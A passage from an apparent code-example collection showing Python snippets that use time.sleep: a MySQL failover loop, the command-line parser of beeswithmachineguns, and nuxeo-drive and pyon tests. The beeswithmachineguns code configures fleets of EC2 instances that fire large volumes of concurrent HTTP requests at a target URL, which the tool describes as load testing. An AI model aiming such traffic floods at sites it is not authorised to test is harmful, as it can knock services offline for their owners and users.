                        warn_msg = _ERRANT_TNX_ERROR
                    console.add_warning('errant_tnx', warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                console.del_warning('errant_tnx')

            res = console.display_console()
            if res is not None:    # None = normal timeout, keep going
                if not res:
                    return False   # Errors detected
                done = True        # User has quit
            first_pass = False

        return True
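
The core of the loop above is a simple reconnect-with-sleep pattern: when the master stops responding, sleep pingtime seconds between reconnect attempts and declare failover only after three consecutive failures. A minimal standalone sketch of that pattern (the connect callable and the function name below are hypothetical, not part of mysql-utilities):

import time

def master_reachable(connect, attempts=3, pingtime=3):
    """Try to reconnect to a master, sleeping between attempts.

    `connect` is any callable that raises on failure; returning False
    signals the caller to start failover.
    """
    for _ in range(attempts):
        try:
            connect()
            return True           # master answered, no failover needed
        except Exception:
            time.sleep(pingtime)  # wait before the next reconnect attempt
    return False                  # still unreachable after all attempts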

Example 47

Project: beeswithmachineguns
Source File: main.py
View license
def parse_options():
    """
    Handle the command line arguments for spinning up bees
    """
    parser = OptionParser(usage="""
bees COMMAND [options]

Bees with Machine Guns

A utility for arming (creating) many bees (small EC2 instances) to attack
(load test) targets (web applications).

commands:
  up      Start a batch of load testing servers.
  attack  Begin the attack on a specific url.
  down    Shutdown and deactivate the load testing servers.
  report  Report the status of the load testing servers.
    """)

    up_group = OptionGroup(parser, "up",
                           """In order to spin up new servers you will need to specify at least the -k command, which is the name of the EC2 keypair to use for creating and connecting to the new servers. The bees will expect to find a .pem file with this name in ~/.ssh/. Alternatively, bees can use SSH Agent for the key.""")

    # Required
    up_group.add_option('-k', '--key',  metavar="KEY",  nargs=1,
                        action='store', dest='key', type='string',
                        help="The ssh key pair name to use to connect to the new servers.")

    up_group.add_option('-s', '--servers', metavar="SERVERS", nargs=1,
                        action='store', dest='servers', type='int', default=5,
                        help="The number of servers to start (default: 5).")
    up_group.add_option('-g', '--group', metavar="GROUP", nargs=1,
                        action='store', dest='group', type='string', default='default',
                        help="The security group(s) to run the instances under (default: default).")
    up_group.add_option('-z', '--zone',  metavar="ZONE",  nargs=1,
                        action='store', dest='zone', type='string', default='us-east-1d',
                        help="The availability zone to start the instances in (default: us-east-1d).")
    up_group.add_option('-i', '--instance',  metavar="INSTANCE",  nargs=1,
                        action='store', dest='instance', type='string', default='ami-ff17fb96',
                        help="The instance-id to use for each server from (default: ami-ff17fb96).")
    up_group.add_option('-t', '--type',  metavar="TYPE",  nargs=1,
                        action='store', dest='type', type='string', default='t1.micro',
                        help="The instance-type to use for each server (default: t1.micro).")
    up_group.add_option('-l', '--login',  metavar="LOGIN",  nargs=1,
                        action='store', dest='login', type='string', default='newsapps',
                        help="The ssh username name to use to connect to the new servers (default: newsapps).")
    up_group.add_option('-v', '--subnet',  metavar="SUBNET",  nargs=1,
                        action='store', dest='subnet', type='string', default=None,
                        help="The vpc subnet id in which the instances should be launched. (default: None).")
    up_group.add_option('-b', '--bid', metavar="BID", nargs=1,
                        action='store', dest='bid', type='float', default=None,
                        help="The maximum bid price per spot instance (default: None).")

    parser.add_option_group(up_group)

    attack_group = OptionGroup(parser, "attack",
                               """Beginning an attack requires only that you specify the -u option with the URL you wish to target.""")

    # Required
    attack_group.add_option('-u', '--url', metavar="URL", nargs=1,
                            action='store', dest='url', type='string',
                            help="URL of the target to attack.")
    attack_group.add_option('-K', '--keepalive',
                            action='store_true', dest='keep_alive', default=False,
                            help="Keep-Alive connection.")
    attack_group.add_option('-p', '--post-file',  metavar="POST_FILE",  nargs=1,
                            action='store', dest='post_file', type='string', default=False,
                            help="The POST file to deliver with the bee's payload.")
    attack_group.add_option('-m', '--mime-type',  metavar="MIME_TYPE",  nargs=1,
                            action='store', dest='mime_type', type='string', default='text/plain',
                            help="The MIME type to send with the request.")
    attack_group.add_option('-n', '--number', metavar="NUMBER", nargs=1,
                            action='store', dest='number', type='int', default=1000,
                            help="The number of total connections to make to the target (default: 1000).")
    attack_group.add_option('-C', '--cookies', metavar="COOKIES", nargs=1, action='store', dest='cookies',
                            type='string', default='',
                            help='Cookies to send during http requests. The cookies should be passed using standard cookie formatting, separated by semi-colons and assigned with equals signs.')
    attack_group.add_option('-c', '--concurrent', metavar="CONCURRENT", nargs=1,
                            action='store', dest='concurrent', type='int', default=100,
                            help="The number of concurrent connections to make to the target (default: 100).")
    attack_group.add_option('-H', '--headers', metavar="HEADERS", nargs=1,
                            action='store', dest='headers', type='string', default='',
                            help="HTTP headers to send to the target to attack. Multiple headers should be separated by semi-colons, e.g header1:value1;header2:value2")
    attack_group.add_option('-e', '--csv', metavar="FILENAME", nargs=1,
                            action='store', dest='csv_filename', type='string', default='',
                            help="Store the distribution of results in a csv file for all completed bees (default: '').")
    attack_group.add_option('-P', '--contenttype', metavar="CONTENTTYPE", nargs=1,
                            action='store', dest='contenttype', type='string', default='text/plain',
                            help="ContentType header to send to the target of the attack.")
    attack_group.add_option('-I', '--sting', metavar="sting", nargs=1,
                            action='store', dest='sting', type='int', default=1,
                            help="The flag to sting (ping to cache) url before attack (default: 1). 0: no sting, 1: sting sequentially, 2: sting in parallel")
    attack_group.add_option('-S', '--seconds', metavar="SECONDS", nargs=1,
                            action='store', dest='seconds', type='int', default=60,
                            help= "hurl only: The number of total seconds to attack the target (default: 60).")
    attack_group.add_option('-X', '--verb', metavar="VERB", nargs=1,
                            action='store', dest='verb', type='string', default='',
                            help= "hurl only: Request command -HTTP verb to use -GET/PUT/etc. Default GET")
    attack_group.add_option('-M', '--rate', metavar="RATE", nargs=1,
                            action='store', dest='rate', type='int',
                            help= "hurl only: Max Request Rate.")
    attack_group.add_option('-a', '--threads', metavar="THREADS", nargs=1,
                            action='store', dest='threads', type='int', default=1,
                            help= "hurl only: Number of parallel threads. Default: 1")
    attack_group.add_option('-f', '--fetches', metavar="FETCHES", nargs=1,
                            action='store', dest='fetches', type='int', 
                            help= "hurl only: Num fetches per instance.")
    attack_group.add_option('-d', '--timeout', metavar="TIMEOUT", nargs=1,
                            action='store', dest='timeout', type='int',
                            help= "hurl only: Timeout (seconds).")
    attack_group.add_option('-E', '--send_buffer', metavar="SEND_BUFFER", nargs=1,
                            action='store', dest='send_buffer', type='int',
                            help= "hurl only: Socket send buffer size.")
    attack_group.add_option('-F', '--recv_buffer', metavar="RECV_BUFFER", nargs=1,
                            action='store', dest='recv_buffer', type='int',
                            help= "hurl only: Socket receive buffer size.")
    # Optional
    attack_group.add_option('-T', '--tpr', metavar='TPR', nargs=1, action='store', dest='tpr', default=None, type='float',
                            help='The upper bounds for time per request. If this option is passed and the target is below the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-R', '--rps', metavar='RPS', nargs=1, action='store', dest='rps', default=None, type='float',
                            help='The lower bounds for request per second. If this option is passed and the target is above the value a 1 will be returned with the report details (default: None).')
    attack_group.add_option('-A', '--basic_auth', metavar='basic_auth', nargs=1, action='store', dest='basic_auth', default='', type='string',
                            help='BASIC authentication credentials, format auth-username:password (default: None).')
    attack_group.add_option('-j', '--hurl', metavar="HURL_COMMANDS",
                            action='store_true', dest='hurl',
                            help="use hurl")
    attack_group.add_option('-o', '--long_output', metavar="LONG_OUTPUT",
                            action='store_true', dest='long_output',
                            help="display hurl output")
    attack_group.add_option('-L', '--responses_per', metavar="RESPONSE_PER",
                            action='store_true', dest='responses_per',
                            help="hurl only: Display http(s) response codes per interval instead of request statistics")


    parser.add_option_group(attack_group)

    (options, args) = parser.parse_args()

    if len(args) <= 0:
        parser.error('Please enter a command.')

    command = args[0]
    #set time for in between threads
    delay = 0.2

    if command == 'up':
        if not options.key:
            parser.error('To spin up new instances you need to specify a key-pair name with -k')

        if options.group == 'default':
            print('New bees will use the "default" EC2 security group. Please note that port 22 (SSH) is not normally open on this group. You will need to use to the EC2 tools to open it before you will be able to attack.')
        zone_len = options.zone.split(',')
        if len(zone_len) > 1:
            if len(options.instance.split(',')) != len(zone_len):
                print("Your instance count does not match zone count")
                sys.exit(1)
            else:
                ami_list = [a for a in options.instance.split(',')]
                zone_list = [z for z in zone_len]
                # for each ami and zone set zone and instance
                for tup_val in zip(ami_list, zone_list):
                    options.instance, options.zone = tup_val
                    threading.Thread(target=bees.up, args=(options.servers, options.group,
                                                            options.zone, options.instance,
                                                            options.type,options.login,
                                                            options.key, options.subnet,
                                                            options.bid)).start()
                    #time allowed between threads
                    time.sleep(delay)
        else:
            bees.up(options.servers, options.group, options.zone, options.instance, options.type, options.login, options.key, options.subnet, options.bid)

    elif command == 'attack':
        if not options.url:
            parser.error('To run an attack you need to specify a url with -u')

        regions_list = []
        for region in bees._get_existing_regions():
            regions_list.append(region)

        # urlparse needs a scheme in the url. ab doesn't, so add one just for the sake of parsing.
        # urlparse('google.com').path == 'google.com' and urlparse('google.com').netloc == '' -> True
        parsed = urlparse(options.url) if '://' in options.url else urlparse('http://'+options.url)
        if parsed.path == '':
            options.url += '/'
        additional_options = dict(
            cookies=options.cookies,
            headers=options.headers,
            post_file=options.post_file,
            keep_alive=options.keep_alive,
            mime_type=options.mime_type,
            csv_filename=options.csv_filename,
            tpr=options.tpr,
            rps=options.rps,
            basic_auth=options.basic_auth,
            contenttype=options.contenttype,
            sting=options.sting,
            hurl=options.hurl,
            seconds=options.seconds,
            rate=options.rate,
            long_output=options.long_output,
            responses_per=options.responses_per,
            verb=options.verb,
            threads=options.threads,
            fetches=options.fetches,
            timeout=options.timeout,
            send_buffer=options.send_buffer,
            recv_buffer=options.recv_buffer
        )
        if options.hurl:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.hurl_attack, args=(options.url, options.number, options.concurrent),
                    kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)
        else:
            for region in regions_list:
                additional_options['zone'] = region
                threading.Thread(target=bees.attack, args=(options.url, options.number,
                    options.concurrent), kwargs=additional_options).start()
                #time allowed between threads
                time.sleep(delay)

    elif command == 'down':
        bees.down()
    elif command == 'report':
        bees.report()
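
A detail worth noting in the example above: one worker thread is started per region (or per zone/AMI pair), with time.sleep(delay) between the .start() calls so the launches are staggered rather than fired simultaneously. A stripped-down sketch of that stagger (the worker callable and function name are placeholders, not part of beeswithmachineguns):

import threading
import time

def launch_staggered(worker, regions, delay=0.2):
    """Start one thread per region, pausing `delay` seconds between starts."""
    threads = []
    for region in regions:
        t = threading.Thread(target=worker, args=(region,))
        t.start()
        threads.append(t)
        time.sleep(delay)  # small gap between launches, as in parse_options above
    return threads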

Example 48

Project: nuxeo-drive
Source File: test_remote_deletion.py
View license
    def test_synchronize_remote_deletion_local_modification(self):
        raise SkipTest("Behavior has changed with trash feature - remove this test ?")
        """Test remote deletion with concurrent local modification

        Use cases:
          - Remotely delete a regular folder and make some
            local changes concurrently.
              => Only locally modified content should be kept
                 and should be marked as 'unsynchronized',
                 other content should be deleted.
          - Remotely restore folder from the trash.
              => Remote documents should be merged with
                 locally modified content which should be unmarked
                 as 'unsynchronized'.
          - Remotely delete a file and locally update its content concurrently.
              => File should be kept locally and be marked as 'unsynchronized'.
          - Remotely restore file from the trash.
              => Remote file should be merged with locally modified file with
                 a conflict detection and both files should be marked
                 as 'synchronized'.
          - Remotely delete a file and locally rename it concurrently.
              => File should be kept locally and be marked as 'synchronized'.
          - Remotely restore file from the trash.
              => Remote file should be merged with locally renamed file and
                 both files should be marked as 'synchronized'.

        See TestIntegrationSecurityUpdates
                .test_synchronize_denying_read_access_local_modification
        as the same use cases are tested.

        Note that we use the .odt extension for test files to make sure
        that they are created as File and not Note documents on the server
        when synchronized upstream, as the current implementation of
        RemoteDocumentClient is File oriented.
        """
        # Bind the server and root workspace
        self.engine_1.start()
        # Get local and remote clients
        local = self.local_client_1
        remote = self.remote_document_client_2

        # Create documents in the remote root workspace
        # then synchronize
        remote.make_folder('/', 'Test folder')
        remote.make_file('/Test folder', 'joe.odt', 'Some content')
        remote.make_file('/Test folder', 'jack.odt', 'Some content')
        remote.make_folder('/Test folder', 'Sub folder 1')
        remote.make_file('/Test folder/Sub folder 1', 'sub file 1.txt',
                         'Content')
        self.wait_sync(wait_for_async=True)
        self.assertTrue(local.exists('/Test folder'))
        self.assertTrue(local.exists('/Test folder/joe.odt'))
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 1'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))

        # Delete remote folder and make some local changes
        # concurrently then synchronize
        remote.delete('/Test folder')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        # Create new file
        local.make_file('/Test folder', 'new.odt', "New content")
        # Create new folder with files
        local.make_folder('/Test folder', 'Sub folder 2')
        local.make_file('/Test folder/Sub folder 2', 'sub file 2.txt',
                        'Other content')
        # Update file
        local.update_content('/Test folder/joe.odt', 'Some updated content')
        self.wait_sync(wait_for_async=True)
        # Only locally modified content should exist
        # and should be marked as 'unsynchronized', other content should
        # have been deleted
        # Local check
        self.assertTrue(local.exists('/Test folder'))
        self.assertTrue(local.exists('/Test folder/joe.odt'))
        self.assertEquals(local.get_content('/Test folder/joe.odt'),
                          'Some updated content')
        self.assertTrue(local.exists('/Test folder/new.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 2'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 2/sub file 2.txt'))

        self.assertFalse(local.exists('/Test folder/jack.odt'))
        self.assertFalse(local.exists('/Test folder/Sub folder 1'))
        self.assertFalse(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        # State check
        self._check_pair_state('/Test folder', 'unsynchronized')
        self._check_pair_state('/Test folder/joe.odt',
                               'unsynchronized')
        self._check_pair_state('/Test folder/new.odt',
                               'unsynchronized')
        self._check_pair_state('/Test folder/Sub folder 2',
                               'unsynchronized')
        self._check_pair_state('/Test folder/Sub folder 2/sub file 2.txt',
                               'unsynchronized')
        # Remote check
        self.assertFalse(remote.exists('/Test folder'))

        # Restore remote folder and its children from trash then synchronize
        remote.undelete('/Test folder')
        remote.undelete('/Test folder/joe.odt')
        remote.undelete('/Test folder/jack.odt')
        remote.undelete('/Test folder/Sub folder 1')
        remote.undelete('/Test folder/Sub folder 1/sub file 1.txt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored documents should be merged with
        # locally modified content which should be unmarked
        # as 'unsynchronized' and therefore synchronized upstream
        # Local check
        self.assertTrue(local.exists('/Test folder'))
        children_info = local.get_children_info('/Test folder')
        self.assertEquals(len(children_info), 6)
        for info in children_info:
            if info.name == 'joe.odt':
                remote_version = info
            elif info.name.startswith('joe (') and info.name.endswith(').odt'):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        self.assertTrue(local.exists(remote_version.path))
        self.assertEquals(local.get_content(remote_version.path),
                          'Some content')
        self.assertTrue(local.exists(local_version.path))
        self.assertEquals(local.get_content(local_version.path),
                          'Some updated content')
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/new.odt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 1'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        self.assertTrue(local.exists('/Test folder/Sub folder 2'))
        self.assertTrue(local.exists(
                                '/Test folder/Sub folder 2/sub file 2.txt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/joe.odt',
                               'synchronized')
        self._check_pair_state('/Test folder/new.odt',
                               'synchronized')
        self._check_pair_state('/Test folder/Sub folder 2',
                               'synchronized')
        self._check_pair_state('/Test folder/Sub folder 2/sub file 2.txt',
                               'synchronized')
        # Remote check
        self.assertTrue(remote.exists('/Test folder'))
        test_folder_uid = remote.get_info('/Test folder').uid
        children_info = remote.get_children_info(test_folder_uid)
        self.assertEquals(len(children_info), 6)
        for info in children_info:
            if info.name == 'joe.odt':
                remote_version = info
            elif info.name.startswith('joe (') and info.name.endswith(').odt'):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        remote_version_ref_length = (len(remote_version.path)
                                     - len(TEST_WORKSPACE_PATH))
        remote_version_ref = remote_version.path[-remote_version_ref_length:]
        self.assertTrue(remote.exists(remote_version_ref))
        self.assertEquals(remote.get_content(remote_version_ref),
                          'Some content')
        local_version_ref_length = (len(local_version.path)
                                     - len(TEST_WORKSPACE_PATH))
        local_version_ref = local_version.path[-local_version_ref_length:]
        self.assertTrue(remote.exists(local_version_ref))
        self.assertEquals(remote.get_content(local_version_ref),
                          'Some updated content')
        self.assertTrue(remote.exists('/Test folder/jack.odt'))
        self.assertTrue(remote.exists('/Test folder/new.odt'))
        self.assertTrue(remote.exists('/Test folder/Sub folder 1'))
        self.assertTrue(remote.exists(
                                '/Test folder/Sub folder 1/sub file 1.txt'))
        self.assertTrue(remote.exists('/Test folder/Sub folder 2'))
        self.assertTrue(remote.exists(
                    '/Test folder/Sub folder 2/sub file 2.txt'))

        # Delete remote file and update its local content
        # concurrently then synchronize
        remote.delete('/Test folder/jack.odt')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.update_content('/Test folder/jack.odt', 'Some updated content')
        self.wait_sync(wait_for_async=True)
        # File should be kept locally and be marked as 'unsynchronized'.
        # Local check
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertEquals(local.get_content('/Test folder/jack.odt'),
                          'Some updated content')
        # Remote check
        self.assertFalse(remote.exists('/Test folder/jack.odt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/jack.odt', 'unsynchronized')

        # Remotely restore file from the trash then synchronize
        remote.undelete('/Test folder/jack.odt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored file should be merged with locally modified file
        # with a conflict detection and both files should be marked
        # as 'synchronized'
        # Local check
        children_info = local.get_children_info('/Test folder')
        for info in children_info:
            if info.name == 'jack.odt':
                remote_version = info
            elif (info.name.startswith('jack (')
                  and info.name.endswith(').odt')):
                local_version = info
        self.assertTrue(remote_version is not None)
        self.assertTrue(local_version is not None)
        self.assertTrue(local.exists(remote_version.path))
        self.assertEquals(local.get_content(remote_version.path),
                          'Some content')
        self.assertTrue(local.exists(local_version.path))
        self.assertEquals(local.get_content(local_version.path),
                          'Some updated content')
        # Remote check
        self.assertTrue(remote.exists(remote_version.path))
        self.assertEquals(remote.get_content(remote_version.path),
                          'Some content')
        local_version_path = self._truncate_remote_path(local_version.path)
        self.assertTrue(remote.exists(local_version_path))
        self.assertEquals(remote.get_content(local_version_path),
                          'Some updated content')
        # State check
        self._check_pair_state(remote_version.path, 'synchronized')
        self._check_pair_state(local_version.path, 'synchronized')

        # Delete remote file and rename it locally
        # concurrently then synchronize
        remote.delete('/Test folder/jack.odt')
        time.sleep(OS_STAT_MTIME_RESOLUTION)
        local.rename('/Test folder/jack.odt', 'jack renamed.odt')
        self.wait_sync(wait_for_async=True)
        # File should be kept locally and be marked as 'synchronized'
        # Local check
        self.assertFalse(local.exists('/Test folder/jack.odt'))
        self.assertTrue(local.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(local.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # Remote check
        self.assertFalse(remote.exists('/Test folder/jack.odt'))
        # State check
        self._check_pair_state('/Test folder', 'synchronized')
        self._check_pair_state('/Test folder/jack renamed.odt', 'synchronized')

        # Remotely restore file from the trash then synchronize
        remote.undelete('/Test folder/jack.odt')
        self.wait_sync(wait_for_async=True)
        # Remotely restored file should be merged with locally renamed file
        # and both files should be marked as 'synchronized'
        # Local check
        self.assertTrue(local.exists('/Test folder/jack.odt'))
        self.assertEquals(local.get_content('/Test folder/jack.odt'),
                          'Some content')
        self.assertTrue(local.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(local.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # Remote check
        self.assertTrue(remote.exists('/Test folder/jack.odt'))
        self.assertEquals(remote.get_content('/Test folder/jack.odt'),
                          'Some content')
        self.assertTrue(remote.exists('/Test folder/jack renamed.odt'))
        self.assertEquals(remote.get_content('/Test folder/jack renamed.odt'),
                          'Some content')
        # State check
        self._check_pair_state('/Test folder/jack.odt', 'synchronized')
        self._check_pair_state('/Test folder/jack renamed.odt', 'synchronized')
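
The time.sleep(OS_STAT_MTIME_RESOLUTION) calls above sit between the remote deletion and the local edits, presumably so the local changes land on a strictly later st_mtime than the last scan and are therefore picked up by mtime-based change detection. A self-contained illustration of the idea (the constant's value and the helper below are assumptions for illustration, not nuxeo-drive definitions):

import os
import time

OS_STAT_MTIME_RESOLUTION = 1.0  # assumed filesystem mtime granularity, in seconds

def rewrite_with_new_mtime(path, content):
    """Rewrite `path`, sleeping first so the new mtime is distinguishable
    from the previous one even on filesystems with coarse timestamps."""
    previous_mtime = os.stat(path).st_mtime
    time.sleep(OS_STAT_MTIME_RESOLUTION)  # let the clock move past the resolution
    with open(path, 'w') as f:
        f.write(content)
    assert os.stat(path).st_mtime > previous_mtime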

Example 50

Project: pyon
Source File: test_channel.py
View license
    def test_consume_one_message_at_a_time(self):
        # end to end test for CIDEVCOI-547 requirements
        #    - Process P1 is producing one message every 5 seconds
        #    - Process P2 is producing one other message every 3 seconds
        #    - Process S creates an auto-delete=False queue without a consumer and without a binding
        #    - Process S binds this queue through a pyon.net or container API call to the topic of process P1
        #    - Process S waits a bit
        #    - Process S checks the number of messages in the queue
        #    - Process S creates a consumer, takes one message off the queue (non-blocking) and destroys the consumer
        #    - Process S waits a bit (let messages accumulate)
        #    - Process S creates a consumer, takes a message off and repeats this until no messages are left (without ever blocking) and destroys the consumer
        #    - Process S waits a bit (let messages accumulate)
        #    - Process S creates a consumer, takes a message off and repeats this until no messages are left (without ever blocking). Then requeues the last message and destroys the consumer
        #    - Process S creates a consumer, takes one message off the queue (non-blocking) and destroys the consumer.
        #    - Process S sends prior message to its queue (note: may be tricky without a subscription to yourself)
        #    - Process S changes the binding of queue to P1 and P2
        #    - Process S removes all bindings of queue
        #    - Process S deletes the queue
        #    - Process S exits without any residual resources in the broker
        #    - Processes P1 and P2 get terminated without any residual resources in the broker
        #
        #    * Show this works with the ACK or no-ACK mode
        #    * Do the above with semi-abstracted calls (some nicer boilerplate)

        def every_five():
            p = self.container.node.channel(PublisherChannel)
            p._send_name = NameTrio(bootstrap.get_sys_name(), 'routed.5')
            counter = 0

            while not self.publish_five.wait(timeout=5):
                p.send('5,' + str(counter))
                counter += 1

        def every_three():
            p = self.container.node.channel(PublisherChannel)
            p._send_name = NameTrio(bootstrap.get_sys_name(), 'routed.3')
            counter = 0

            while not self.publish_three.wait(timeout=3):
                p.send('3,' + str(counter))
                counter += 1

        self.publish_five = Event()
        self.publish_three = Event()
        self.five_events = Queue()
        self.three_events = Queue()

        gl_every_five = spawn(every_five)
        gl_every_three = spawn(every_three)

        def listen(lch):
            """
            The purpose of this listen method is to trigger waits in the code below.
            By setting up a listener that subscribes to both 3 and 5, and putting received
            messages into the appropriate gevent-queues client side, we can assume that
            the channel we're actually testing with get_stats etc has had the message delivered
            too.
            """
            lch._queue_auto_delete = False
            lch.setup_listener(NameTrio(bootstrap.get_sys_name(), 'alternate_listener'), 'routed.3')
            lch._bind('routed.5')
            lch.start_consume()

            while True:
                try:
                    newchan = lch.accept()
                    m, h, d = newchan.recv()
                    count = m.rsplit(',', 1)[-1]
                    if m.startswith('5,'):
                        self.five_events.put(int(count))
                        newchan.ack(d)
                    elif m.startswith('3,'):
                        self.three_events.put(int(count))
                        newchan.ack(d)
                    else:
                        raise StandardError("unknown message: %s" % m)

                except ChannelClosedError:
                    break

        lch = self.container.node.channel(SubscriberChannel)
        gl_listen = spawn(listen, lch)

        def do_cleanups(gl_e5, gl_e3, gl_l, lch):
            self.publish_five.set()
            self.publish_three.set()
            gl_e5.join(timeout=5)
            gl_e3.join(timeout=5)

            lch.stop_consume()
            lch._destroy_queue()
            lch.close()
            gl_listen.join(timeout=5)

        self.addCleanup(do_cleanups, gl_every_five, gl_every_three, gl_listen, lch)

        ch = self.container.node.channel(RecvChannel)
        ch._recv_name = NameTrio(bootstrap.get_sys_name(), 'test_queue')
        ch._queue_auto_delete = False

        # #########
        # THIS TEST EXPECTS OLD BEHAVIOR OF NO QOS, SO SET A HIGH BAR
        # #########
        ch._transport.qos_impl(prefetch_count=9999)

        def cleanup_channel(thech):
            thech._destroy_queue()
            thech.close()

        self.addCleanup(cleanup_channel, ch)

        # declare exchange and queue, no binding yet
        ch._declare_exchange(ch._recv_name.exchange)
        ch._declare_queue(ch._recv_name.queue)
        ch._purge()

        # do binding to 5 pub only
        ch._bind('routed.5')

        # wait for one message
        self.five_events.get(timeout=10)

        # ensure 1 message, 0 consumer
        self.assertTupleEqual((1, 0), ch.get_stats())

        # start a consumer
        ch.start_consume()
        time.sleep(0.1)
        self.assertEquals(ch._recv_queue.qsize(), 1)       # should have been delivered to the channel, waiting for us now

        # receive one message with instant timeout
        m, h, d = ch.recv(timeout=0)
        self.assertEquals(m, "5,0")
        ch.ack(d)

        # we have no more messages, should instantly fail
        self.assertRaises(PQueue.Empty, ch.recv, timeout=0)

        # stop consumer
        ch.stop_consume()

        # wait until next 5 publish event
        self.five_events.get(timeout=10)

        # start consumer again, empty queue
        ch.start_consume()
        time.sleep(0.1)
        while True:
            try:
                m, h, d = ch.recv(timeout=0)
                self.assertTrue(m.startswith('5,'))
                ch.ack(d)
            except PQueue.Empty:
                ch.stop_consume()
                break

        # wait for new message
        self.five_events.get(timeout=10)

        # consume and requeue
        ch.start_consume()
        time.sleep(0.1)
        m, h, d = ch.recv(timeout=0)
        self.assertTrue(m.startswith('5,'))
        ch.reject(d, requeue=True)

        # rabbit appears to deliver this later on, only once another message is in the queue
        # wait for another message publish
        num = self.five_events.get(timeout=10)
        self.assertEquals(num, 3)
        time.sleep(0.1)

        expect = ["5,2", "5,3"]
        while True:
            try:
                m, h, d = ch.recv(timeout=0)
                self.assertTrue(m.startswith('5,'))
                self.assertEquals(m, expect.pop(0))

                ch.ack(d)
            except PQueue.Empty:
                ch.stop_consume()
                self.assertListEqual(expect, [])
                break

        # let's change the binding to the 3 now, empty the testqueue first (artifact of test)
        while not self.three_events.empty():
            self.three_events.get(timeout=0)

        # we have to keep the exchange around - it will likely autodelete.
        ch2 = self.container.node.channel(RecvChannel)
        ch2.setup_listener(NameTrio(bootstrap.get_sys_name(), "another_queue"))

        ch._destroy_binding()
        ch._bind('routed.3')

        ch2._destroy_queue()
        ch2.close()

        self.three_events.get(timeout=10)
        ch.start_consume()
        time.sleep(0.1)
        self.assertEquals(ch._recv_queue.qsize(), 1)

        m, h, d = ch.recv(timeout=0)
        self.assertTrue(m.startswith('3,'))
        ch.ack(d)

        # wait for a new 3 to reject
        self.three_events.get(timeout=10)
        time.sleep(0.1)

        m, h, d = ch.recv(timeout=0)
        ch.reject(d, requeue=True)

        # recycle consumption, should get the requeued message right away?
        ch.stop_consume()
        ch.start_consume()
        time.sleep(0.1)

        self.assertEquals(ch._recv_queue.qsize(), 1)

        m2, h2, d2 = ch.recv(timeout=0)
        self.assertEquals(m, m2)

        ch.stop_consume()
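
The repeated time.sleep(0.1) calls after start_consume() give the consumer a moment to move freshly delivered messages into the channel's in-memory queue before the test asserts on qsize. A slightly more robust variant of the same idea is to poll a predicate with short sleeps up to a timeout; a generic sketch (not part of pyon):

import time

def wait_until(predicate, timeout=2.0, interval=0.1):
    """Poll `predicate` every `interval` seconds until it returns True
    or `timeout` seconds elapse; return the final truth value."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        if predicate():
            return True
        time.sleep(interval)  # brief pause between polls instead of one fixed delay
    return bool(predicate())

# e.g. instead of time.sleep(0.1) followed by an assert on the queue size:
#     assert wait_until(lambda: ch._recv_queue.qsize() == 1)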